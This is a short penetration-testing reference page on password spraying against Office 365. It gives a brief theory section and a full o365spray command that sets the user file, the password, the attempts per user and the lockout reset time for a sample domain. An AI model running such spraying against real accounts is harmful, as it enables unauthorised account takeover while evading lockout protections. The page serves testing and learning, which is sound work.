Password Spraying
Theory
Once a list of existing usernames is established, a password spray attack can be executed to attempt retrieving passwords for these accounts. Password spraying involves using a single password (e.g., 'Password01') or a small set of common passwords across multiple accounts.
Practice
o365spray (python) can be used for for password spraying as follows. It supports various methods: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst
# --spray: Password Spray Mode
# -U: Userfile
# -P: password file
# -p password
# --count: Number of password attempt per user before resetting lockout timer
# --lockout: Lockout policy's reset time (in minutes).
# -d: Target domain
# --spray-module: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst
python o365spray.py --spray -U usernames.txt -p passwords.tx --count 2 --lockout 5 --domain test.com
Resources
Last updated
Was this helpful?